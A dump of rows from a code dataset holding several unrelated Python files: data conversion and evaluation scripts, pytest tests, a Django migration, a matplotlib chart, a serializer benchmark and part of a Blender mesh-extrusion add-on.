for data_file in glob.glob("files_contend/*.json"):
    print data_file
    json_data=open(data_file).read()
    data = json.loads(json_data)
    i = 0
    for post in data:
        tmp=[]
        # Keep only original news posts (skip Re:/Fw: replies and forwards).
        if u'新聞' in post['title'] and u'Re: [新聞]' not in post['title'] and u'Fw: [新聞]' not in post['title']:
            print post['title'].encode('utf-8')
            try:
                tmp.append(post['title'].encode('utf-8'))
                tmp.append(post['date'])
                tmp.append(post['url'])
                # Word-segment the body with jieba, space-joined.
                tmp.append(" ".join(jieba.cut(post['content'], cut_all=False)).encode('utf-8'))
                tmp_all.append(tmp)
            except:
                # NOTE(review): bare except hides the real failure cause.
                print("except")
with open("all_documents.csv", "wb") as f:
    writer = csv.writer(f)
    writer.writerows(tmp_all)
notification.notification('the transfer of json to csv is ready')
|
19,287 | fbfa9c2ebb9d19810443de8bce746d986b4c6f11 | import pandas as pd
import numpy as np
import pytest
import mock
from fixtures import Store
from data import create_config
from collector.tasks.clean_national_dataset.task import CleanNationalDataset
from collector.schema import ValidationError
class TestCleanNationalDatasetRun:
    """Tests for CleanNationalDataset argument validation and run()."""
    @property
    def config(self):
        # Fresh config per access so tests cannot leak state into each other.
        return create_config()
    @mock.patch.object(CleanNationalDataset, "run")
    def test_run_valid_input(self, mock_run):
        """Valid kwargs are validated and forwarded to run() as one dict."""
        task = CleanNationalDataset(self.config["collector"], Store())
        task(input_folder="raw", output_folder="processed")
        mock_run.assert_called_once_with(
            {"input_folder": "raw", "output_folder": "processed"}
        )
    @pytest.mark.parametrize(
        "inputs,messages",
        [
            (
                {},
                [
                    "'input_folder' is a required property",
                    "'output_folder' is a required property",
                ],
            ),
            (
                {"input_folder": 1, "output_folder": 1},
                ["1 is not of type 'string'", "1 is not of type 'string'",],
            ),
            (
                {"input-folder": 1, "output-folder": 1},
                [
                    "'input_folder' is a required property",
                    "'output_folder' is a required property",
                ],
            ),
        ],
    )
    @mock.patch.object(CleanNationalDataset, "run")
    def test_run_invalid_input(self, mock_run, inputs, messages):
        """Schema violations raise ValidationError and never reach run()."""
        task = CleanNationalDataset(self.config["collector"], Store())
        with pytest.raises(ValidationError) as error:
            task(**inputs)
        mock_run.assert_not_called()
        # NOTE(review): the loop variable shadows the pytest.raises `error`
        # binding; the iterable is evaluated first so this works, but a
        # distinct name would be clearer.
        for (idx, error) in enumerate(error.value.errors):
            assert error.message == messages[idx]
    @mock.patch.object(Store, "list")
    @mock.patch.object(CleanNationalDataset, "_read")
    @mock.patch.object(CleanNationalDataset, "_write")
    def test_run(self, mock_write, mock_read, mock_list):
        """run() reads each listed csv, appends a Datum column, writes it out."""
        mock_list.return_value = ["raw/1970-01-01.csv"]
        mock_read.return_value = pd.DataFrame(
            {"PositiefGetest": [1000], "Opgenomen": [2000], "Overleden": [3000]}
        )
        task = CleanNationalDataset(self.config["collector"], Store())
        task(input_folder="raw", output_folder="interim")
        mock_list.assert_called_once_with("raw/*.csv")
        mock_read.assert_called_once_with("raw/1970-01-01.csv")
        mock_write.assert_called_once_with(
            mock.ANY, "interim/1970-01-01.csv", index=False
        )
        # The written frame must equal the input plus the date (from the
        # file name) as a new Datum column.
        pd.testing.assert_frame_equal(
            mock_write.call_args.args[0],
            pd.DataFrame(
                {
                    "PositiefGetest": [1000],
                    "Opgenomen": [2000],
                    "Overleden": [3000],
                    "Datum": ["1970-01-01"],
                }
            ),
            check_dtype=False,
        )
class TestCleanNationalDatasetRead:
    """Tests that _read opens via the Store and delegates to pd.read_csv."""
    @mock.patch.object(Store, "open")
    @mock.patch.object(pd, "read_csv")
    def test_read(self, mock_read_csv, mock_open):
        # pylint: disable=protected-access
        task = CleanNationalDataset(None, Store())
        task._read("test.csv", delimiter=",")
        # Extra kwargs must be forwarded to pandas untouched.
        mock_read_csv.assert_called_once_with(mock.ANY, delimiter=",")
        mock_open.assert_called_once_with("test.csv", "r")
class TestCleanNationalDatasetWrite:
    """Tests that _write opens via the Store and delegates to DataFrame.to_csv."""
    @mock.patch.object(Store, "open")
    @mock.patch.object(pd.DataFrame, "to_csv")
    def test_write(self, mock_to_csv, mock_open):
        # pylint: disable=protected-access
        task = CleanNationalDataset(None, Store())
        task._write(pd.DataFrame(np.zeros(shape=(3, 3))), "test.csv", index=False)
        # Extra kwargs must be forwarded to pandas untouched.
        mock_to_csv.assert_called_once_with(mock.ANY, index=False)
        mock_open.assert_called_once_with("test.csv", "w")
|
19,288 | e3cd5749601243573e6e699c2f73fceb78da3fca |
import argparse
from src.coco_caption.pycocotools.coco import COCO
from src.coco_caption.pycocoevalcap.eval import COCOEvalCap
import pylab
pylab.rcParams['figure.figsize'] = (10.0, 8.0)
import json
from json import encoder
encoder.FLOAT_REPR = lambda o: format(o, '.3f')
def load_json(json_path):
    """Parse the JSON file at *json_path* and return the resulting object."""
    # BUG FIX: the handle was opened into a variable misleadingly named
    # "outfile" and never closed; a context manager handles both.
    with open(json_path, 'r') as infile:
        return json.load(infile)
def save_json(data, output_json):
    """Write *data* to *output_json* as pretty-printed JSON (keys sorted,
    non-ASCII characters kept literal)."""
    # BUG FIX: close the file deterministically via a context manager.
    with open(output_json, 'w') as outfile:
        json.dump(data, outfile, sort_keys=True, indent=4, ensure_ascii=False)
def convert_result(result_json):
    """Normalise a captions results file in place for COCO evaluation.

    Each entry's image_id is coerced to int and any `sentence_*` marker
    tokens are stripped from the caption; the file is overwritten.
    """
    res = load_json(result_json)
    collect = []
    for item in res:
        new = {}
        # BUG FIX: int() already ignores leading zeros; the previous
        # str(...).lstrip('0') crashed on an all-zero id such as "000"
        # (int('') raises ValueError).
        new['image_id'] = int(item['image_id'])
        # Drop the sentence_* marker tokens inserted by the generator.
        new['caption'] = ' '.join(tok for tok in item['caption'].split(' ') if 'sentence_' not in tok)
        collect.append(new)
    save_json(collect, result_json)
    print('converted json saved')
def calculate_metrics(generated_captions_file, true_captions_file):
    """Score generated captions against COCO ground truth and print metrics.

    Returns (coco, cocoEval, cocoRes) for further inspection.
    NOTE(review): the print statement below is Python 2 syntax — this
    module targets Python 2.
    """
    coco = COCO(true_captions_file)
    cocoRes = coco.loadRes(generated_captions_file)
    cocoEval = COCOEvalCap(coco, cocoRes)
    # Restrict evaluation to the images actually present in the results.
    cocoEval.params['image_id'] = cocoRes.getImgIds()
    cocoEval.evaluate()
    for metric, score in cocoEval.eval.items():
        print '%s: %.3f' % (metric, score)
    return coco, cocoEval, cocoRes
def main(generated_captions_file, true_captions_file):
    """Convert the raw results file in place, then evaluate it against truth."""
    convert_result(generated_captions_file)
    calculate_metrics(generated_captions_file, true_captions_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Input Arguments
parser.add_argument(
'--captions-file',
help='JSON file with generated captions and image IDs',
required=True
)
args = parser.parse_args()
arguments = args.__dict__
true_captions_file = 'src/coco_caption/annotations/captions_val2014.json'
main(arguments['captions_file'], true_captions_file)
|
19,289 | f08dd80159a787a6543048c9fae9d95cb14eb2e5 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import matplotlib.pyplot as plt
from matplotlib.mlab import csv2rec
from matplotlib.cbook import get_sample_data
import json
import functions as func
import sys,os
from pylab import *
Y_start=5000
Y_end=50000
space_of_Y=1000
#mpl.rcParams['font.sans-serif'] = ['simhei']
myfont = matplotlib.font_manager.FontProperties(fname='/root/simhei.ttf')
mpl.rcParams['axes.unicode_minus'] = False
# fname = get_sample_data('percent_bachelors_degrees_women_usa.csv')
# gender_degree_data = csv2rec(fname)
aa = json.loads(open("/tmp/second_and_more_cities.txt").read())
# These are the colors that will be used in the plot
color_sequence = ['#1f77b4', '#aec7e8', '#ff7f0e', '#ffbb78', '#2ca02c',
'#98df8a', '#d62728', '#ff9896', '#9467bd', '#c5b0d5',
'#8c564b', '#c49c94', '#e377c2', '#f7b6d2', '#7f7f7f',
'#c7c7c7', '#bcbd22', '#dbdb8d', '#17becf', '#9edae5']
# You typically want your plot to be ~1.33x wider than tall. This plot
# is a rare exception because of the number of lines being plotted on it.
# Common sizes: (10, 7.5) and (12, 9)
fig, ax = plt.subplots(1, 1, figsize=(12, 14))
# Remove the plot frame lines. They are unnecessary here.
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# Ensure that the axis ticks only show up on the bottom and left of the plot.
# Ticks on the right and top of the plot are generally unnecessary.
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
# Limit the range of the plot to only where the data is.
# Avoid unnecessary whitespace.
# plt.xlim(1968.5, 2011.1)
# plt.ylim(-0.25, 90)
plt.xlim(0, 25)
plt.ylim(Y_start, Y_end)
# Make sure your axis ticks are large enough to be easily read.
# You don't want your viewers squinting to read your plot.
plt.xticks(range(0, 24, 1), fontsize=14)
# plt.yticks(range(0, 91, 10), ['{0}%'.format(x)
# for x in range(0, 91, 10)], fontsize=14)
plt.yticks(range(Y_start, Y_end, space_of_Y), fontsize=14)
# Provide tick lines across the plot to help your viewers trace along
# the axis ticks. Make sure that the lines are light and small so they
# don't obscure the primary data lines.
for y in range(Y_start, Y_end, space_of_Y):
plt.plot(range(0, 24, 1), [y] * len(range(0, 24, 1)), '--',
lw=0.5, color='black', alpha=0.3)
# Remove the tick marks; they are unnecessary with the tick lines we just
# plotted.
plt.tick_params(axis='both', which='both', bottom='off', top='off',
labelbottom='on', left='off', right='off', labelleft='on')
# Now that the plot is prepared, it's time to actually plot the data!
# Note that I plotted the majors in order of the highest % in the final year.
majors = ['Health Professions', 'Public Administration', 'Education',
'Psychology', 'Foreign Languages', 'English',
'Communications\nand Journalism', 'Art and Performance', 'Biology',
'Agriculture', 'Social Sciences and History', 'Business',
'Math and Statistics', 'Architecture', 'Physical Sciences',
'Computer Science', 'Engineering']
cities = ["北京","上海","广州","深圳","昆明","杭州","苏州","厦门","南京","西安","珠海","惠州","长沙","武汉","三亚"]
majors = []
for ti in cities:
majors.append("%s_二手房" % ti)
majors.append("%s_新房" % ti)
y_offsets = {'Foreign Languages': 0.5, 'English': -0.5,
'Communications\nand Journalism': 0.75,
'Art and Performance': -0.25, 'Agriculture': 1.25,
'Social Sciences and History': 0.25, 'Business': -0.75,
'Math and Statistics': 0.75, 'Architecture': -0.75,
'Computer Science': 0.75, 'Engineering': -0.25}
y_offsets = {u'北京_新房': 500, u"上海_二手房":-500, u"杭州_二手房":-100,u"广州_二手房":500,u"苏州_二手房":100,u"南京_二手房":-770,u"珠海_新房":-600,u"珠海_二手房":-500,u"昆明_二手房":800,u"昆明_新房":350,u"惠州_新房":-10,u"西安_二手房":-700,u"西安_新房":-1100,u"惠州_二手房":-1700,u"苏州_新房":-1200,u"南京_二手房":-800,u"长沙_二手房":50,"长沙_新房":10}
print len(y_offsets)
print len(majors)
print len(cities)
print len(color_sequence)
#sys.exit()
#func.a_list_of_date(func.get_this)
cc = func.get_this_month_first_day_to_last()[0].strftime("%Y-%m")
bb = func.a_list_of_date(cc,24)
bb.reverse()
for rank, column in enumerate(aa.keys()):
# Plot each line separately with its own color.
# column_rec_name = column.replace('\n', '_').replace(' ', '_').lower()
line = plt.plot([ft for ft in range(24)],
aa[column]['new'],
lw=2.5,
color=color_sequence[rank])
# Add a text label to the right end of every line. Most of the code below
# is adding specific offsets y position because some labels overlapped.
y_pos = int(aa[column]['new'][-1])
if u"%s_新房" % column in y_offsets:
y_pos += y_offsets[u"%s_新房" % column]
# Again, make sure that all labels are large enough to be easily read
# by the viewer.
plt.text(24, y_pos, "%s_%s" % (column,u"新房"), fontsize=9, color=color_sequence[rank],fontproperties=myfont)
# Plot each line separately with its own color.
# column_rec_name = column.replace('\n', '_').replace(' ', '_').lower()
line = plt.plot([ft for ft in range(24)],
aa[column]['second'],
lw=2.5,
color=color_sequence[-(rank+1)])
# Add a text label to the right end of every line. Most of the code below
# is adding specific offsets y position because some labels overlapped.
y_pos = int(aa[column]['second'][-1])
if u"%s_二手房" % column in y_offsets:
y_pos += y_offsets[u"%s_二手房" % column]
# Again, make sure that all labels are large enough to be easily read
# by the viewer.
plt.text(24, y_pos, "%s_%s" % (column,u"二手房"), fontsize=9, color=color_sequence[-(rank+1)],fontproperties=myfont)
# Make the title big enough so it spans the entire plot, but don't make it
# so big that it requires two lines to show.
# Note that if the title is descriptive enough, it is unnecessary to include
# axis labels; they are self-evident, in this plot's case.
plt.title(u'房价', fontsize=18, ha='center',fontproperties=myfont)
# Finally, save the figure as a PNG.
# You can also save it as a PDF, JPEG, etc.
# Just change the file extension in this call.
plt.savefig('second_and_more_cities.png', bbox_inches='tight')
|
19,290 | 576026485149dba9ef2346b1e4ddd3fda77f9b09 | # Generated by Django 3.0.3 on 2020-08-25 04:16
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the 'pedido' app.

    Models: location hierarchy (Provincia > Municipio > Comuna), applicants
    (PessoaEmpresa), land-legalisation requests (TerrenoLegalizar) and their
    payment records (Pago).

    Fix: two FileExtensionValidator calls passed allowed_extensions='pdf'
    (a string). The validator tests ``extension in allowed_extensions``, so a
    bare string accepts any substring of 'pdf' ('p', 'df', ...). They now pass
    a proper list, matching the other validators in this migration.
    """

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Comuna',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comuna', models.CharField(choices=[('Namacunde', 'Namacunde'), ('Chiede', 'Chiede')], max_length=20)),
            ],
        ),
        migrations.CreateModel(
            name='Directivo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nome_directivo', models.CharField(max_length=100, verbose_name='Nome do Chefe de Secção')),
                ('data_nascimento', models.DateField(verbose_name='Data de Nacimento')),
                ('empossamento', models.DateField(verbose_name='Data de Empossamento')),
                ('entrega_cargo', models.DateField(verbose_name='Data de Entrega do Cargo')),
                ('copia_bi', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf', 'jpg'])], verbose_name="'OBS: Só em formato PDF'")),
            ],
        ),
        migrations.CreateModel(
            name='Municipio',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('municipio', models.CharField(choices=[('Namacunde', 'Namacunde')], max_length=12)),
            ],
        ),
        migrations.CreateModel(
            name='PessoaEmpresa',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nome_requerente', models.CharField(blank=True, max_length=50, null=True, verbose_name='Requerente')),
                ('empresa', models.CharField(blank=True, max_length=70, null=True, verbose_name='Representado por')),
                ('data_nascimento', models.DateField(blank=True, null=True, verbose_name='Data de nascimento')),
                ('nome_pai', models.CharField(blank=True, max_length=100, null=True, verbose_name='Nome do Pai')),
                ('nome_mae', models.CharField(blank=True, max_length=100, null=True, verbose_name='Nome da mãe')),
                ('estado_civil', models.CharField(choices=[('Solteiro', 'Solteiro'), ('Casado', 'Casado'), ('Divorciado', 'Divorciado')], max_length=18, verbose_name='Estado Civil')),
                ('naturalidade', models.CharField(blank=True, max_length=50, null=True, verbose_name='Naturalidade')),
                ('bi', models.CharField(blank=True, max_length=14, null=True, verbose_name='BI Nº')),
                ('copia_de_bi', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf', 'jpg'])], verbose_name="Cópia do BI'Só em formato PDF ou jpg'")),
                ('passado_bi', models.CharField(blank=True, max_length=50, null=True, verbose_name='Local de emissão')),
                ('residencia', models.CharField(blank=True, max_length=50, null=True, verbose_name='Residençia')),
                ('numero_casa', models.PositiveIntegerField(blank=True, null=True, verbose_name='Número da Casa')),
                ('sede', models.CharField(blank=True, max_length=100, null=True, verbose_name='Localização da Sede da Empresa')),
                ('email', models.EmailField(blank=True, max_length=254, null=True, verbose_name='Email')),
                ('telefone', models.CharField(blank=True, max_length=12, null=True, verbose_name='Nº de Telefone')),
                ('comuna', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pedido.Comuna')),
                ('municipio', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pedido.Municipio')),
            ],
        ),
        migrations.CreateModel(
            name='Provincia',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('provincia', models.CharField(choices=[('Cunene', 'Cunene')], max_length=10)),
            ],
        ),
        migrations.CreateModel(
            name='TerrenoLegalizar',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('projecto', models.CharField(max_length=255, verbose_name='Nome do projecto')),
                ('localizacao', models.CharField(max_length=100, verbose_name='Local do projecto')),
                ('quarterao', models.CharField(max_length=100, verbose_name='Quarteirão')),
                ('data_entrada', models.DateField(auto_now_add=True)),
                ('pago_apreciado', models.DecimalField(decimal_places=2, max_digits=6, verbose_name='Pagamento de Preciação')),
                ('metros', models.PositiveIntegerField(blank=True, null=True, verbose_name='Extenção em metros quadrados')),
                ('comuna', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pedido.Comuna', verbose_name='Localidade/Bairro')),
                ('municipio', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='pedido.Municipio', verbose_name='Municipio')),
                ('pessoaEmpresa', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pedido.PessoaEmpresa', verbose_name='Legalizador')),
                # NOTE(review): max_length is meaningless on a ForeignKey and is
                # silently ignored by Django — consider dropping it in the model.
                ('provincia_arquivacao', models.ForeignKey(max_length=100, on_delete=django.db.models.deletion.CASCADE, to='pedido.Provincia', verbose_name='Provincia de arquivação')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.AddField(
            model_name='pessoaempresa',
            name='provincia',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pedido.Provincia'),
        ),
        migrations.CreateModel(
            name='Pago',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Fixed: allowed_extensions must be a list, not the string 'pdf'.
                ('parecer_tecnico', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf'])], verbose_name="Parecer Técnico 'OBS: Só formato PDF'")),
                ('primeiro', models.FloatField(verbose_name='Primeira prestação')),
                ('recibo_primeiro', models.FileField(upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf', 'jpg'])], verbose_name="Recibo de deposito 'OBS: Solo formato PDF ou jpg'")),
                ('segundo', models.FloatField(default=0.0, verbose_name='Segunda Prestação')),
                ('recibo_segundo', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf', 'jpg'])], verbose_name='Só formato PDF ou jpg')),
                ('terceiro', models.FloatField(default=0.0, verbose_name='Terceira e última prestação')),
                ('recibo_terceiro', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf', 'jpg'])], verbose_name='Só formato PDF ou jpg')),
                # Fixed: allowed_extensions must be a list, not the string 'pdf'.
                ('processo_requerente', models.FileField(blank=True, null=True, upload_to='%y/%m/%d', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['pdf'])], verbose_name="Processo do Requerente 'OBS: Só em formato PDF'")),
                ('projecto_legalizado', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='pedido.TerrenoLegalizar', verbose_name='Projecto Legalizado')),
            ],
        ),
        migrations.AddField(
            model_name='municipio',
            name='provincia',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pedido.Provincia'),
        ),
        migrations.AddField(
            model_name='comuna',
            name='municipio',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pedido.Municipio'),
        ),
    ]
|
19,291 | 5dd7caf2a1a1f0d398e4385c0bb00d468aa263db | import json, pickle, yaml, marshal
from collections import OrderedDict
import json, pickle, yaml, marshal
import timeit

# Benchmark: time how fast each serializer can DUMP the same document that was
# loaded from origin.yaml.  Each candidate is run 5 times and the best time wins.
with open(r"origin.yaml") as fp:
    # Explicit Loader: yaml.load() without one is deprecated/unsafe in
    # PyYAML >= 5.1.  SafeLoader handles plain data; switch to FullLoader if
    # origin.yaml uses custom tags.
    data = yaml.load(fp, Loader=yaml.SafeLoader)

# Statement templates timed by timeit (json/pickle/marshal use dumps(),
# yaml uses dump()) and the setup that imports the module under test.
run = '''{unit}.dumps(data{method})'''
run_1 = '''{unit}.dump(data{method})'''
init = '''import {unit}
from __main__ import data'''

# (statement, setup, label) triples.  NOTE: the 'ext' format argument is
# unused by the templates; it is kept only as a label hint.
cmds = []
cmds.append((run.format(unit='json', method=''), init.format(unit='json', ext='json'), 'json'))
cmds.append((run_1.format(unit='yaml', method=''), init.format(unit='yaml', ext='yaml'), 'yaml'))
cmds.append((run.format(unit='pickle', method=',protocol=0'), init.format(unit='pickle', ext='pickle_v0'), 'pickle v0'))
cmds.append((run.format(unit='pickle', method=',protocol=1'), init.format(unit='pickle', ext='pickle_v1'), 'pickle v1'))
cmds.append((run.format(unit='pickle', method=',protocol=2'), init.format(unit='pickle', ext='pickle_v2'), 'pickle v2'))
cmds.append((run.format(unit='pickle', method=',protocol=3'), init.format(unit='pickle', ext='pickle_v3'), 'pickle v3'))
cmds.append((run.format(unit='pickle', method=',protocol=4'), init.format(unit='pickle', ext='pickle_v4'), 'pickle v4'))
cmds.append((run.format(unit='marshal', method=',0'), init.format(unit='marshal', ext='marshal_v0'), 'marshal v0'))
cmds.append((run.format(unit='marshal', method=',1'), init.format(unit='marshal', ext='marshal_v1'), 'marshal v1'))
cmds.append((run.format(unit='marshal', method=',2'), init.format(unit='marshal', ext='marshal_v2'), 'marshal v2'))
cmds.append((run.format(unit='marshal', method=',3'), init.format(unit='marshal', ext='marshal_v3'), 'marshal v3'))
cmds.append((run.format(unit='marshal', method=',4'), init.format(unit='marshal', ext='marshal_v4'), 'marshal v4'))

for run_cmd, init_cmd, title in cmds:
    # Label fixed from 'LOAD' to 'DUMP': the timed statement is dumps()/dump(),
    # i.e. serialization, not deserialization.
    print('DUMP {}: '.format(title.upper()), min(timeit.Timer(stmt=run_cmd, setup=init_cmd).repeat(repeat=5, number=1)))
|
19,292 | 4e3362ef9fdce87e5197ea55fcdbc2d58619f7ef | # # -*- coding: UTF-8 -*-
import utils
# Smoke test for the project's utils helper: parse two timestamps and print
# them (presumably epoch seconds — TODO confirm against utils.getTimeSec)
# together with their difference.
t1 = utils.getTimeSec("2017-11-17 16:40:00")
t2 = utils.getTimeSec("2016-07-04 00:00:00")
print(t1, t2, t1-t2)
# import time
# import sys
# import binascii
# import uuid
# import socket
# import struct
# import os
# import math
# import decorator
# import shutil
#
# split = ''
#
# LOG_INTERVAL = 5
# class utils_py3(object):
# def __init__(self):
#
# # def getNow(self):
# # return int(time.time())
# #
# # def getDateSec(self,desc):
# # time_local = time.strptime(desc, '%Y%m%d')
# # return int(time.mktime(time_local))
# pass
#
# def getHMSec(desc):
# time_local = time.strptime(desc, '%H:%M')
# return time_local.tm_hour * 3600 + time_local.tm_min * 60
#
# def getDateSec(self,desc):
# time_local = time.strptime(desc, '%Y%m%d')
# return int(time.mktime(time_local))
# def getNow(self):
# return int(time.time())
# #001
#
# def getTimeDes(self,sec=None):
# if sec is None:
# sec = int(time.time())
# else:
# pass
# tplSec = time.localtime(sec)
# print('tplSec:',tplSec)
#
# return time.strftime('%Y-%m-%d %X',tplSec)
# #返回值为 :2017-11-02 19:20:08
# #002
#
# def getTimeDay(self,sec=None):
# if sec is None:
# sec = int(time.time())
# tplSec = time.localtime(sec)
# return '%04d-%02d-%02d' %tplSec[:3]
# #返回值:2017-11-02
# #003
# def getTimeSec(self,desc):
# if isinstance(desc,int):
# desc = str(desc)
# if len(desc) == 0:
# return self.getNow()
# if len(desc) <= 10:
# return self.getDateSec(desc)
# if desc.count('-') == 1:
# time_local = time.strptime(desc,'%Y%m%d-%H:%M:%S')
# elif desc.count('-') == 2:
# time_local = time.strptime(desc,'%Y-%m-%d %H:%M:%S')
# return int(time.mktime(time_local))
#
# class Logger(object):
# def __init__(self):
# self.lastPrintTime = 0
# self.log_file = None
#
# def _set_log_file(self,filename):
# self.log_file = open(filename,'w')
#
# def _reset_log_file(self,):
# if self.log_file:
# self.log_file.close()
# self.log_file = None
#
# def _print(self,msg):
# info = '%s : %s' %(self.getTimeDes(),msg)
#
#
#
#
#
# if __name__ == "__main__":
#
# test = utils_py3()
# # sec = int(time.mktime(time.strptime(time.time(),'%Y%m%d')))
# sec = '2017-11-02 20:23:37'
# sec2 = ''
# sec3 ='20171102'
# sec4 = '20171102-20:23:37'
# sec5 = 1509625923
# # print(sec)
# #001
# print(test.getTimeDes())
# #002
# print(test.getTimeDay())
# #003
# print(test.getTimeSec(sec))
# print(test.getTimeSec(sec2))
# print(test.getTimeSec(sec3))
# print(test.getTimeSec(sec4))
# print(test.getTimeSec(sec5))
# #4
# msg='1'
# logs = test.Logger()
# print(logs._print(msg))
#
|
19,293 | 1a4c96a5e3c519548badb6057d3a3953a0b863c0 | # Repeats extrusion, rotation, scale, movement for one or more faces.
# borrowed from user liero (http://blenderartists.org/forum/showthread.php?219526-Multiple-extrusions-script)
# original source: http://dl.dropbox.com/u/16486113/Blender/mexii.py
# Add-on metadata consumed by Blender's add-on manager.
bl_info = {
    "name": "Repeat Extrude",
    "version": (1, 0, 0),
    "blender": (2, 74, 0),
    "location": "View3D > Tool Shelf",
    "description": "Repeat extrusions from faces.",
    'warning': '',
    "category": "Mesh"}
import bpy
import bmesh
import random
import math
from math import radians
from random import gauss
from mathutils import Euler
from bpy.props import FloatProperty, BoolProperty, IntProperty
def vlocation(self, r):
    """Seeded gaussian offset noise for repetition *r* (sigma = Offset Var / 3)."""
    random.seed(self.seed + r)
    sigma = self.var1 / 3
    return random.gauss(0, sigma)
def vrotation(self, r):
    """Seeded Euler rotation for repetition *r*: base X/Y/Z angles (degrees)
    plus gaussian noise with sigma = Rotation Var / 3."""
    random.seed(self.seed + r)
    sigma = self.var2 / 3
    angles = [radians(base) + random.gauss(0, sigma)
              for base in (self.rotx, self.roty, self.rotz)]
    return Euler(angles, 'XYZ')
class ScaleProperties(bpy.types.PropertyGroup):
    """One scale setting plus an optional logarithmic attenuation factor.

    Reused by RepeatExtrude for per-axis and combined scaling.
    """
    scale = FloatProperty(name='Scale', min=0.1, soft_min=0.5, \
        soft_max=1.2, max =2, default=.9, description='Scaling')
    factor_type = bpy.props.EnumProperty(
        items= (
            ('NONE', 'None', ''),
            ('LOG', 'Log', ''),
            ('LOGINVERSE', 'Log inverse', '')
        ),
        name = "Factor type")
    factor = FloatProperty(name='Factor', min=0.00005, soft_min=0.00005, \
        soft_max=30, default=1, description='Factor')
    def register_layout(self, layout, text):
        """Draw this group's widgets into *layout*, labelled with *text*."""
        column = layout.column(align=True)
        column.label(text=text + ' scale:')
        column.prop(self, 'scale', slider=True)
        row = column.row(align=False)
        row.prop(self, 'factor_type', expand=True)
        column.prop(self, 'factor', slider=True)
    def calculate_scale(self, repetitions, repetition, seed, scale_variance):
        """Return the scale for one repetition: base scale with seeded gaussian
        noise, optionally attenuated by log(repetition) or its inverse."""
        # Re-seeding per repetition keeps results reproducible for a given seed.
        random.seed(seed + repetition)
        result = self.scale * (1 + random.gauss(0, scale_variance / 3))
        try:
            if (self.factor_type == 'LOG'):
                # math.log(0) raises ValueError on the first repetition; the
                # bare except below then falls back to the plain scale.
                log = math.log(repetition)
                if (log > 0):
                    result -= log * self.factor
            if (self.factor_type == 'LOGINVERSE'):
                log = math.log(repetitions - repetition)
                if (log > 0):
                    result -= log * self.factor
        # NOTE(review): bare except also hides unrelated errors — consider
        # narrowing to ValueError.
        except:
            result = self.scale
        return result
class OffsetProperties(bpy.types.PropertyGroup):
    """One translation-offset setting plus an optional logarithmic attenuation
    factor.  Reused by RepeatExtrude for the X/Y/Z offsets."""
    offset = FloatProperty(name='Offset', min=-85, soft_min=-30, \
        soft_max=30, max=85, default=0, description='Offset')
    factor_type = bpy.props.EnumProperty(
        items= (
            ('NONE', 'None', ''),
            ('LOG', 'Log', ''),
            ('LOGINVERSE', 'Log inverse', '')
        ),
        name = "Factor type")
    factor = FloatProperty(name='Factor', min=0.00005, soft_min=0.00005, \
        soft_max=30, default=1, description='Factor')
    def register_layout(self, layout, text):
        """Draw this group's widgets into *layout*, labelled with *text*."""
        column = layout.column(align=True)
        column.label(text=text + ' offset:')
        column.prop(self, 'offset', slider=True)
        row = column.row(align=False)
        row.prop(self, 'factor_type', expand=True)
        column.prop(self, 'factor', slider=True)
    def calculate_offset(self, repetitions, repetition):
        """Return the offset for one repetition, optionally attenuated by
        log(repetition) or its inverse (falls back to the plain offset when
        math.log raises, e.g. at repetition 0)."""
        result = self.offset
        try:
            if (self.factor_type == 'LOG'):
                log = math.log(repetition)
                if (log > 0):
                    result -= log * self.factor
            if (self.factor_type == 'LOGINVERSE'):
                log = math.log(repetitions - repetition)
                if (log > 0):
                    result -= log * self.factor
        # NOTE(review): bare except also hides unrelated errors — consider
        # narrowing to ValueError.
        except:
            result = self.offset
        return result
class RepeatExtrude(bpy.types.Operator):
    """Repeatedly extrude the selected faces of the active mesh, applying a
    per-step rotation, per-axis offset and scaling, with optional seeded
